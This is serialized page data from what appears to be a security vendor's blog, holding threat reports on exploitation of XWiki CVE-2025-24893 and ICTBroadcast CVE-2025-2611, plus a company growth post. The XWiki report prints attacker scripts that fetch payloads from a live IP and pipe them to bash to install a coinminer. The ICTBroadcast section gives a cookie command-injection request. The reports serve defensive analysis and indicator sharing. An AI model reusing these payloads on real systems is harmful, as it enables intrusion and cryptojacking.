zero-days","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-hackingteam-successor-linked-to-recent-chrome-zero-days\u002F",{"title":31586,"source":14382,"link":31587,"date":31588},"Active Exploits Hit Dassault and XWiki — CISA Confirms Critical Flaws Under Attack","https:\u002F\u002Fthehackernews.com\u002F2025\u002F10\u002Factive-exploits-hit-dassault-and-xwiki.html","2025-10-29",{"title":31590,"source":25677,"link":31591,"date":31588},"Attackers Exploit XWiki RCE Vulnerability to Deploy Cryptocurrency Miners","https:\u002F\u002Fcyberpress.org\u002Fxwiki-rce-vulnerability\u002F",{"title":31593,"source":14378,"link":31594,"date":31588},"XWiki Vulnerability Exploited in Cryptocurrency Mining Operation","https:\u002F\u002Fwww.securityweek.com\u002Fxwiki-vulnerability-exploited-in-cryptocurrency-mining-operation\u002F",{"title":31596,"source":12145,"link":31597,"date":31588},"Hackers Hijack Corporate XWiki Servers for Crypto Mining","https:\u002F\u002Fhackread.com\u002Fhackers-hijack-xwiki-servers-crypto-mining\u002F",{"title":31599,"source":14407,"link":31600,"date":31588},"XWiki Remote Code Execution Flaw Actively Weaponized for Coinmining","https:\u002F\u002Fgbhackers.com\u002Fxwiki-remote-code-execution-flaw\u002F#google_vignette",{"title":31602,"source":12153,"link":31603,"date":31588},"Dassault Apriso flaws added to CISA list of exploited vulnerabilities","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fdassault-apriso-flaws-added-to-cisa-list-of-exploited-vulnerabilities",{"title":31605,"source":12153,"link":31606,"date":31607},"Cryptomining operation underpinned by critical XWiki exploit","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fcryptomining-operation-underpinned-by-critical-xwiki-exploit","2025-10-30",{"title":31609,"source":14382,"link":31610,"date":31611},"CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks","https:\u002F\u002Fthehackernews.com\u002F2025\u002F10\u002Fcisa-flags-vmware-zero-day-exploited-by.html?m=1","2025-10-31",{"title":31613,"source":12153,"link":31614,"date":31611},"XWiki and VMware flaws to CISA list of exploited vulnerabilities","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fxwiki-and-vmware-flaws-to-cisa-list-of-exploited-vulnerabilities",{"title":31616,"source":14378,"link":31617,"date":31611},"CISA Adds Exploited XWiki, VMware Flaws to KEV Catalog","https:\u002F\u002Fwww.securityweek.com\u002Fcisa-adds-exploited-xwiki-vmware-flaws-to-kev-catalog\u002F",[31619],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":31621,"toc":32038},[31622,31625,31670,31673,31687,31691,31695,31698,31702,31706,31725,31731,31738,31780,31783,31787,31791,31794,31798,31802,31825,31831,31897,31909,31913,31917,31931,31943,31948,31950,31953,31957,31964,31966,31998,32000,32003,32005,32018,32035],[263,31623],{":list":31624,"ico":266,"title":20},"[\"XWiki CVE-2025-24893 is under active exploitation, with VulnCheck Canaries capturing a two-stage attack chain that delivers a coinminer through the template-injection vulnerability.\",\"CISA KEV does not currently list this vulnerability, underscoring that real-world exploitation often precedes official recognition.\",\"VulnCheck Canaries confirm the exploitation chain and infrastructure, providing concrete indicators defenders can use to identify related activity.\"]",[18,31626,31627,31630,31631,31636,31637,31639,31640,31644,31645,1246,31650,1255,31655,31660,31661,31664,31665,31669],{},[47,31628,30050],{"href":30048,"rel":31629},[51]," is an unauthenticated, remote template-injection vulnerability in ",[47,31632,31635],{"href":31633,"rel":31634},"https:\u002F\u002Fwww.xwiki.org\u002Fxwiki\u002Fbin\u002Fview\u002FMain\u002FWebHome",[51],"XWiki"," that is being actively exploited in the wild. It does ",[295,31638,6881],{}," appear in ",[47,31641,31643],{"href":2864,"rel":31642},[51],"CISA KEV",". Public reporting from ",[47,31646,31649],{"href":31647,"rel":31648},"https:\u002F\u002Fcyble.com\u002Fblog\u002Fcyble-sensors-detect-exploit-attempts-on-ivanti-avtech-ip-cameras\u002F",[51],"Cyble",[47,31651,31654],{"href":31652,"rel":31653},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fvulnerability\u002Fmap\u002F?day=2025-10-26&host_type=src&vulnerability=cve-2025-24893",[51],"Shadow Server",[47,31656,31659],{"href":31657,"rel":31658},"https:\u002F\u002Fapp.crowdsec.net\u002Fcti\u002Fcve-explorer\u002FCVE-2025-24893",[51],"CrowdSec"," prompted us to add the vulnerability to ",[47,31662,1233],{"href":10806,"rel":31663},[51]," in March 2025, but those reports only indicate exploit attempts. Our ",[47,31666,31668],{"href":920,"rel":31667},[51],"VulnCheck Canaries"," observed a two-stage exploit chain and associated indicators. Below are the technical details.",[18,31671,31672],{},"We observed multiple exploit attempts against our XWiki canaries coming from an attacker geolocated in Vietnam. The exploitation proceeds in a two-pass workflow separated by at least 20 minutes: the first pass stages a downloader (writes a file to disk), and the second pass later executes it.",[18,31674,31675,31676,31679,31680,31682,31683,31686],{},"The first request looks like this (the ",[886,31677,31678],{},"text="," parameter is URL-encoded; decoded, it executes a ",[886,31681,1553],{}," that saves a file to ",[886,31684,31685],{},"\u002Ftmp\u002F11909","):",[68,31688],{"src":31689,"alt":21258,"className":31690},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F1-light.png",[10876,21260],[68,31692],{"src":31693,"alt":21258,"className":31694},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F1-dark.png",[21265,21266],[18,31696,31697],{},"Decoded (for clarity):",[68,31699],{"src":31700,"alt":21292,"className":31701},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F2-light.png",[10876,21260],[68,31703],{"src":31704,"alt":21292,"className":31705},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F2-dark.png",[21265,21266],[18,31707,31708,31709,31711,31712,31715,31716,31718,31719,31724],{},"The payload uses ",[886,31710,1553],{}," to fetch a downloader from ",[886,31713,31714],{},"193.32.208.24:8080"," and write it to ",[886,31717,31685],{},". That host is serving files via an instance of ",[47,31720,31723],{"href":31721,"rel":31722},"https:\u002F\u002Fgithub.com\u002Fdutchcoders\u002Ftransfer.sh",[51],"transfer.sh"," on port 8080, which hosts not only this secondary payload but additional stages as well.",[18,31726,31727],{},[68,31728],{"alt":31729,"src":31730},"Attacker Hosting on FOFA","\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002Fattacker-hosting.png",[18,31732,31733,31734,31737],{},"The downloaded file, ",[886,31735,31736],{},"x640",", is a small downloader that immediately pulls and pipes two follow-on scripts to bash.",[1354,31739,31742],{"className":31740,"code":31741,"language":2186,"meta":219,"style":219},"language-sh shiki shiki-themes material-theme-lighter github-light github-dark monokai","#!\u002Fbin\u002Fbash\n\nwget -qO- http:\u002F\u002F193.32.208.24:8080\u002F5UipND4m3B\u002Fx521 | bash\nwget -qO- http:\u002F\u002F193.32.208.24:8080\u002FrAWQVR4aQk\u002Fx522 | bash\n",[886,31743,31744,31749,31753,31767],{"__ignoreMap":219},[1373,31745,31746],{"class":1375,"line":1376},[1373,31747,31748],{"class":4630},"#!\u002Fbin\u002Fbash\n",[1373,31750,31751],{"class":1375,"line":220},[1373,31752,6520],{"emptyLinePlaceholder":237},[1373,31754,31755,31757,31759,31762,31764],{"class":1375,"line":1266},[1373,31756,1553],{"class":2206},[1373,31758,2213],{"class":2209},[1373,31760,31761],{"class":1391}," http:\u002F\u002F193.32.208.24:8080\u002F5UipND4m3B\u002Fx521",[1373,31763,2233],{"class":1397},[1373,31765,31766],{"class":2206}," bash\n",[1373,31768,31769,31771,31773,31776,31778],{"class":1375,"line":1852},[1373,31770,1553],{"class":2206},[1373,31772,2213],{"class":2209},[1373,31774,31775],{"class":1391}," http:\u002F\u002F193.32.208.24:8080\u002FrAWQVR4aQk\u002Fx522",[1373,31777,2233],{"class":1397},[1373,31779,31766],{"class":2206},[18,31781,31782],{},"This downloader is staged by the first exploit and only executed after the attacker’s second pass. The second request for execution looks like this:",[68,31784],{"src":31785,"alt":21314,"className":31786},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F3-light.png",[10876,21260],[68,31788],{"src":31789,"alt":21314,"className":31790},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F3-dark.png",[21265,21266],[18,31792,31793],{},"Decoded for readability, the payload invokes:",[68,31795],{"src":31796,"alt":21330,"className":31797},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F4-light.png",[10876,21260],[68,31799],{"src":31800,"alt":21330,"className":31801},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F4-dark.png",[21265,21266],[18,31803,31804,31805,31807,31808,982,31811,31814,31815,31817,31818,31821,31822,31824],{},"When executed, ",[886,31806,31685],{}," downloads and runs ",[886,31809,31810],{},"x521",[886,31812,31813],{},"x522",", where ",[886,31816,31810],{}," fetches and installs a coinminer (",[886,31819,31820],{},"tcrond",") and ",[886,31823,31813],{}," starts the miner and attempts to kill competing miners.",[18,31826,31827,31828,31830],{},"Below ",[886,31829,31810],{}," fetches and installs the coinminer binary:",[1354,31832,31834],{"className":2195,"code":31833,"language":2197,"meta":219,"style":219},"#!\u002Fbin\u002Fbash\n\nrm -rf \u002Fvar\u002Ftmp\u002F...\u002F\nmkdir \u002Fvar\u002Ftmp\u002F...\nmkdir \u002Fvar\u002Ftmp\u002F...\u002F...\ncd \u002Fvar\u002Ftmp\u002F...\u002F...\nwget -q http:\u002F\u002F193.32.208.24:8080\u002FrDuiQRKhs5\u002Ftcrond\nchmod +x tcrond\n",[886,31835,31836,31840,31844,31855,31863,31870,31876,31886],{"__ignoreMap":219},[1373,31837,31838],{"class":1375,"line":1376},[1373,31839,31748],{"class":4630},[1373,31841,31842],{"class":1375,"line":220},[1373,31843,6520],{"emptyLinePlaceholder":237},[1373,31845,31846,31849,31852],{"class":1375,"line":1266},[1373,31847,31848],{"class":2206},"rm",[1373,31850,31851],{"class":2209}," -rf",[1373,31853,31854],{"class":1391}," \u002Fvar\u002Ftmp\u002F...\u002F\n",[1373,31856,31857,31860],{"class":1375,"line":1852},[1373,31858,31859],{"class":2206},"mkdir",[1373,31861,31862],{"class":1391}," \u002Fvar\u002Ftmp\u002F...\n",[1373,31864,31865,31867],{"class":1375,"line":4692},[1373,31866,31859],{"class":2206},[1373,31868,31869],{"class":1391}," \u002Fvar\u002Ftmp\u002F...\u002F...\n",[1373,31871,31872,31874],{"class":1375,"line":4724},[1373,31873,21460],{"class":1379},[1373,31875,31869],{"class":1391},[1373,31877,31878,31880,31883],{"class":1375,"line":4756},[1373,31879,1553],{"class":2206},[1373,31881,31882],{"class":2209}," -q",[1373,31884,31885],{"class":1391}," http:\u002F\u002F193.32.208.24:8080\u002FrDuiQRKhs5\u002Ftcrond\n",[1373,31887,31888,31891,31894],{"class":1375,"line":4768},[1373,31889,31890],{"class":2206},"chmod",[1373,31892,31893],{"class":1391}," +x",[1373,31895,31896],{"class":1391}," tcrond\n",[18,31898,31899,31901,31902,31904,31905,31908],{},[886,31900,31813],{}," then prepares the environment, kills competing miners, and launches the miner (",[886,31903,31820],{},") with a ",[886,31906,31907],{},"c3pool.org"," configuration:",[68,31910],{"src":31911,"alt":21345,"className":31912},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F5-light.png",[10876,21260],[68,31914],{"src":31915,"alt":21345,"className":31916},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F5-dark.png",[21265,21266],[18,31918,31919,10515,31923,31928,31929,59],{},[47,31920,31820],{"href":31921,"rel":31922},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fe00e9f9d8d3ea668fbc88ed25a9eefb5b9d8d86a993ff78482500e99ae64351e\u002Fcommunity",[51],[47,31924,31927],{"href":31925,"rel":31926},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F164105513f7b83e60a79e8b6a23c2a6cdaae7b0f7a105d8820c9dbf67ada5c1c",[51],"UPX-packed",". The miner, apparently part of a low-end operation, is configured to connect to ",[886,31930,31907],{},[18,31932,31933,31934,31937,31938,31942],{},"All attack traffic originates from ",[886,31935,31936],{},"123.25.249.88",", an IP that geolocates to Vietnam and appears in several recent AbuseIPDB reports. Below is a screenshot from ",[47,31939,24833],{"href":31940,"rel":31941},"https:\u002F\u002Fwww.abuseipdb.com\u002Fcheck\u002F123.25.249.88",[51]," showing the report history for that address.",[18,31944,31945],{},[68,31946],{"alt":24833,"src":31947},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002Fabuseipdb.png",[61,31949,24910],{"id":24909},[18,31951,31952],{},"The following indicators summarize the infrastructure, files, and hashes associated with this activity.",[993,31954,31956],{"id":31955},"observed-ip-addresses","Observed IP Addresses",[22,31958,31959,31961],{},[25,31960,31936],{},[25,31962,31963],{},"193.32.208.24",[993,31965,14665],{"id":14662},[22,31967,31968,31974,31980,31986,31992],{},[25,31969,31970,31971],{},"tcrond (UPX packed): ",[886,31972,31973],{},"0b907eee9a85d39f8f0d7c503cc1f84a71c4de10",[25,31975,31976,31977],{},"tcrond (unpacked): ",[886,31978,31979],{},"90d274c7600fbdca5fe035250d0baff20889ec2b",[25,31981,31982,31983],{},"x521: ",[886,31984,31985],{},"de082aeb01d41dd81cfb79bc5bfa33453b0022ed",[25,31987,31988,31989],{},"x522: ",[886,31990,31991],{},"2abd6f68a24b0a5df5809276016e6b85c77e5f7f",[25,31993,31994,31995],{},"x640: ",[886,31996,31997],{},"5abc337dbc04fee7206956dad1e0b6d43921a868",[61,31999,1903],{"id":1902},[18,32001,32002],{},"VulnCheck and others have tracked this vulnerability being exploited in the wild for much of 2025. Its absence from CISA KEV highlights that the catalog does not capture all real-world exploitation. By integrating third-party evidence of exploitation from sources like Cyble and Shadow Server, VulnCheck KEV identifies emerging threats sooner, while VulnCheck Canaries provide the direct observations needed to validate and now report active exploitation even faster.",[61,32004,202],{"id":201},[18,32006,29952,32007,1246,32010,1255,32013,59],{},[47,32008,30353],{"href":30351,"rel":32009},[51],[47,32011,30358],{"href":30356,"rel":32012},[51],[47,32014,32017],{"href":32015,"rel":32016},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fgit-parameter-rce",[51],"Command Injection in Jenkins via Git Parameter (CVE-2025-53652)",[18,32019,1228,32020,1234,32023,1240,32026,1246,32029,1255,32032,1260],{},[47,32021,1233],{"href":10806,"rel":32022},[51],[47,32024,1239],{"href":1237,"rel":32025},[51],[47,32027,1245],{"href":1243,"rel":32028},[51],[47,32030,1251],{"href":1249,"rel":32031},[51],[47,32033,216],{"href":1258,"rel":32034},[51],[2901,32036,32037],{},"html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}",{"title":219,"searchDepth":220,"depth":220,"links":32039},[32040,32044,32045],{"id":24909,"depth":220,"text":24910,"children":32041},[32042,32043],{"id":31955,"depth":1266,"text":31956},{"id":14662,"depth":1266,"text":14665},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck Canaries captured live exploitation of XWiki CVE-2025-24893, a vulnerability absent from CISA KEV but actively abused in the wild.",{"slug":32048},"xwiki-cve-2025-24893-eitw","\u002Fblog\u002Fxwiki-cve-2025-24893-eitw",{"title":19428,"description":32046},"blog\u002Fxwiki-cve-2025-24893-eitw",[2941,242,1281,1279],"Nvd5cPgg0UBZOzrlsksdenILgs6uzBKW_KkFnFUY_Uo",{"id":32055,"title":32056,"articles":32057,"authors":32058,"body":32064,"date":32186,"description":32068,"extension":234,"image":7,"link":7,"meta":32187,"navigation":237,"path":32188,"seo":32189,"series":7,"stem":32190,"subtype":7,"tags":32191,"__hash__":32192},"blog\u002Fblog\u002Fq3-2025-momentum.md","Accelerating Our Footprint and Innovation: Why VulnCheck Posted a Record-Setting Q3",[],[32059],{"name":32060,"avatar":32061,"link":32062,"linkName":32063},"Tom Bain","\u002Fteam\u002Fthomas-bain.jpg","https:\u002F\u002Fx.com\u002Ftmbainjr1","@tmbainjr1",{"type":15,"value":32065,"toc":32179},[32066,32069,32077,32080,32086,32089,32092,32095,32101,32104,32110,32119,32125,32128,32135,32155,32161,32164,32170,32173,32176],[18,32067,32068],{},"This quarter was a defining one for VulnCheck — not just in numbers, but in what those numbers represent and how critical VulnCheck is in both enriching cyber products in the market and protecting our global economy and national security.",[18,32070,32071,32076],{},[47,32072,32075],{"href":32073,"rel":32074},"https:\u002F\u002Fwww.vulncheck.com\u002Fpress\u002Fvulncheck-momentum-2025",[51],"Crossing the $10 million in ARR"," and posting our first $2M+ quarter marks a historic milestone for us. But it’s also a signal that the cybersecurity market is waking up to the reality that exploit intelligence is the missing layer in vulnerability management — and that our approach is fundamentally reshaping how teams think about defending emerging threats at scale.",[18,32078,32079],{},"This is on top of VulnCheck’s triple-digit growth in 2024 where we tripled ARR year-over-year, grew our customer base 152%, and achieved 100% gross retention. That tells me something simple yet powerful: our customers are not just staying with us — they’re expanding with us. And we’re staffing up to support customers at scale, growing global headcount by 126% YTD.",[61,32081,32083],{"id":32082},"a-shift-in-the-threat-landscape",[295,32084,32085],{},"A Shift in the Threat Landscape",[18,32087,32088],{},"The urgency behind this growth is real.",[18,32090,32091],{},"In the past year alone, vulnerabilities exploited on or before disclosure have caused a 180% spike in breaches making exploitation now the leading cause of major cyber incidents - - more than phishing. And the window from “public disclosure” to “in-the-wild” activity is shrinking from weeks to hours.",[18,32093,32094],{},"Security teams don’t need more alerts or some single pane  — they need faster, smarter data with context. That’s where VulnCheck is leading the charge: providing real-time, autonomously pulled intelligence that combines vulnerability, exploit, and threat data into a single, actionable signal.",[61,32096,32098],{"id":32097},"growing-the-leadership-bench",[295,32099,32100],{},"Growing the Leadership Bench",[18,32102,32103],{},"We also welcomed two powerhouse additions to the company this quarter.",[18,32105,32106,32109],{},[47,32107,256],{"href":258,"rel":32108},[51],", our new Vice President of Security Research, brings deep experience in vulnerability analysis and threat research. She’s already expanding our research programs and publishing findings that help the entire industry understand exploitation at scale.",[18,32111,32112,32113,32118],{},"VulnCheck also added ",[47,32114,32117],{"href":32115,"rel":32116},"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fpatrickmorley\u002F",[51],"Patrick Morley",", former CEO of Carbon Black, to our Board of Directors. Patrick’s track record in scaling one of cybersecurity’s most successful companies is invaluable as we continue to expand our global presence across enterprise and federal markets.",[993,32120,32122],{"id":32121},"community-customers-and-category-leadership",[295,32123,32124],{},"Community, Customers, and Category Leadership",[18,32126,32127],{},"From the start, VulnCheck has been focused on community and transparency.",[18,32129,10402,32130,32134],{},[47,32131,28667],{"href":32132,"rel":32133},"https:\u002F\u002Fwww.vulncheck.com\u002Fcommunity",[51]," now has over 12,000 registered users — researchers, defenders, and vendors who rely on VulnCheck KEV, NVD++, and XDB to stay ahead of exploitation.",[18,32136,32137,32138,32143,32144,32149,32150,59],{},"We also launched the ",[47,32139,32142],{"href":32140,"rel":32141},"https:\u002F\u002Fwww.vulncheck.com\u002Fpress\u002Fvulncheck-announces-partner-program",[51],"VulnCheck Partner Program"," on a global scale, hosted our first ",[47,32145,32148],{"href":32146,"rel":32147},"https:\u002F\u002Fwww.threatcon1.org",[51],"THREATCON1"," conference (which drew more than 300 attendees), and were recognized by SINET16 as one of ",[47,32151,32154],{"href":32152,"rel":32153},"https:\u002F\u002Fwww.vulncheck.com\u002Fpress\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator",[51],"the most innovative cybersecurity companies of 2025",[18,32156,32157,32158,59],{},"Behind the metrics, though, is something more meaningful: ",[295,32159,32160],{},"trust",[18,32162,32163],{},"We’ve earned it from our customers by delivering intelligence that arrives hours, days, and sometimes even years before traditional sources. And we’ve earned it from the community by maintaining a transparent, open-source-aligned approach to vulnerability data.",[61,32165,32167],{"id":32166},"looking-ahead",[295,32168,32169],{},"Looking Ahead",[18,32171,32172],{},"Momentum like this doesn’t happen by accident. It comes from relentless focus — on solving a real problem, building a culture of technical excellence, and staying close to the customers who are counting on us.",[18,32174,32175],{},"We’ve ascended from 115th in CVE assignment ranking to 56th out of 518 CNAs from Q2 to Q3 this year which demonstrates our commitment to vulnerability research in the broader cyber market.",[18,32177,32178],{},"As we look toward 2026, we’re not just growing a company. We’re building a foundation for how the world understands and responds to exploited vulnerabilities better, faster and with more emerging threat context. Because when every hour counts, intelligence has to move at the speed of business to outpace adversaries.",{"title":219,"searchDepth":220,"depth":220,"links":32180},[32181,32182,32185],{"id":32082,"depth":220,"text":32085},{"id":32097,"depth":220,"text":32100,"children":32183},[32184],{"id":32121,"depth":1266,"text":32124},{"id":32166,"depth":220,"text":32169},"2025-10-16",{},"\u002Fblog\u002Fq3-2025-momentum",{"title":32056,"description":32068},"blog\u002Fq3-2025-momentum",[],"N9Vwm5xStkaSl_yp8rBU03ieZg1PcY4Tq_Nb8Zkwa8U",{"id":32194,"title":24026,"articles":32195,"authors":32237,"body":32239,"date":32465,"description":32466,"extension":234,"image":7,"link":7,"meta":32467,"navigation":237,"path":32469,"seo":32470,"series":7,"stem":32471,"subtype":7,"tags":32472,"__hash__":32473},"blog\u002Fblog\u002Fictbroadcast-kev.md",[32196,32200,32203,32206,32209,32212,32215,32218,32221,32224,32227,32230,32233],{"title":32197,"source":14382,"link":32198,"date":32199},"Hackers Target ICTBroadcast Servers via Cookie Exploit to Gain Remote Shell Access","https:\u002F\u002Fthehackernews.com\u002F2025\u002F10\u002Fhackers-target-ictbroadcast-servers-via.html","2025-10-15",{"title":32201,"source":3495,"link":32202,"date":32199},"Risky Bulletin: Windows 10 reaches End-of-Life","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-windows-10-reaches-end-of-life\u002F",{"title":32204,"source":19479,"link":32205,"date":32186},"Breach Roundup: Chinese Hackers Exploited ArcGIS","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32207,"link":32208,"date":32186},"DeviceSecurity","https:\u002F\u002Fwww.devicesecurity.io\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32210,"link":32211,"date":32186},"CareersInfoSecurity","https:\u002F\u002Fwww.careersinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32213,"link":32214,"date":32186},"CUInfoSecurity","https:\u002F\u002Fwww.cuinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32216,"link":32217,"date":32186},"DataBreachToday","https:\u002F\u002Fwww.databreachtoday.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32219,"link":32220,"date":32186},"Fraudtoday.io","https:\u002F\u002Fwww.fraudtoday.io\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32222,"link":32223,"date":32186},"GovInfoSecurity","https:\u002F\u002Fwww.govinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32225,"link":32226,"date":32186},"HealthCareInfoSecurity","https:\u002F\u002Fwww.healthcareinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749",{"title":32204,"source":32228,"link":32229,"date":32186},"InfoRiskToday","https:\u002F\u002Fwww.inforisktoday.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32231,"link":32232,"date":32186},"PaymentSecurity.io","https:\u002F\u002Fwww.paymentsecurity.io\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32234,"source":14378,"link":32235,"date":32236},"In Other News: CrowdStrike Vulnerabilities, CISA Layoffs, Mango Data Breach","https:\u002F\u002Fwww.securityweek.com\u002Fin-other-news-crowdstrike-vulnerabilities-cisa-layoffs-mango-data-breach\u002F","2025-10-17",[32238],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":32240,"toc":32456},[32241,32244,32250,32252,32270,32287,32291,32298,32304,32318,32326,32332,32339,32345,32352,32358,32385,32389,32400,32404,32415,32419,32426,32428,32439],[263,32242],{":list":32243,"ico":266,"title":20},"[\"VulnCheck observed that CVE-2025-2611 is being actively exploited. Attackers are leveraging the unauthenticated command injection in ICTBroadcast via the `BROADCAST` cookie to gain remote code execution. Approximately 200 online instances are exposed.\",\"Indicators overlap with prior activity documented by Fortinet, suggesting possible reuse or shared tooling.\",\"Detections and intelligence are available. VulnCheck customers have access to Snort and Suricata signatures, as well as IP Intelligence, to help detect and mitigate this exploitation.\"]",[18,32245,32246],{},[68,32247],{"alt":32248,"src":32249},"CVE-2025-2611-kev","\u002Fblog\u002Fictbroadcast-kev\u002FCVE-2025-2611-kev.png",[61,32251,11273],{"id":11272},[18,32253,32254,32255,32258,32259,32263,32264,32269],{},"On October 11, we added ",[47,32256,23717],{"href":23715,"rel":32257},[51]," to the ",[47,32260,32262],{"href":10806,"rel":32261},[51],"VulnCheck Known Exploited Vulnerability Catalog"," (VulnCheck KEV) after observing attackers exploiting the vulnerability in the wild. CVE-2025-2611 is an unauthenticated command injection affecting ICTBroadcast, a call center software platform. The software, which should not be internet-facing, currently has a ",[47,32265,32268],{"href":32266,"rel":32267},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=dGl0bGU9IklDVEJyb2FkY2FzdCI%3D",[51],"couple hundred"," instances online.",[18,32271,32272,32273,32276,32277,32282,32283,59],{},"The vulnerability was discovered by Valentin Lobstein (aka ",[47,32274,11008],{"href":11006,"rel":32275},[51],") and disclosed to the vendor in March 2025. Valentin later authored a ",[47,32278,32281],{"href":32279,"rel":32280},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F20446",[51],"Metasploit module"," after the vulnerability exceeded the 120-day disclosure deadline outlined in the ",[47,32284,32286],{"href":14795,"rel":32285},[51],"VulnCheck vulnerability disclosure policy",[61,32288,32290],{"id":32289},"attack-payloads","Attack Payloads",[18,32292,32293,32294,32297],{},"The attacks are occurring in two phases: first a time-based exploit check, then attempts to establish reverse shells. The vulnerability is a command injection affecting the ",[886,32295,32296],{},"BROADCAST"," cookie in the HTTP header.",[1354,32299,32302],{"className":32300,"code":32301,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.1\nHost:\nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F17.4.1 Mobile\u002F15E148 Safari\u002F604.1\nCookie: BROADCAST=`echo${IFS}c2xlZXAgMw==|base64${IFS}-d|sh`\n",[886,32303,32301],{"__ignoreMap":219},[18,32305,32306,32307,32310,32311,32313,32314,32317],{},"The attacker uses a classic command-injection technique: base64-encoding the payload, decoding it with ",[886,32308,32309],{},"base64 -d",", then executing it with ",[886,32312,2186],{},". The payload above decodes to ",[886,32315,32316],{},"sleep 3"," and functions as a timing probe to confirm command execution.",[18,32319,32320,32321,13858,32324,4606],{},"Subsequent attacks used multiple methods to create reverse shells. From traditional 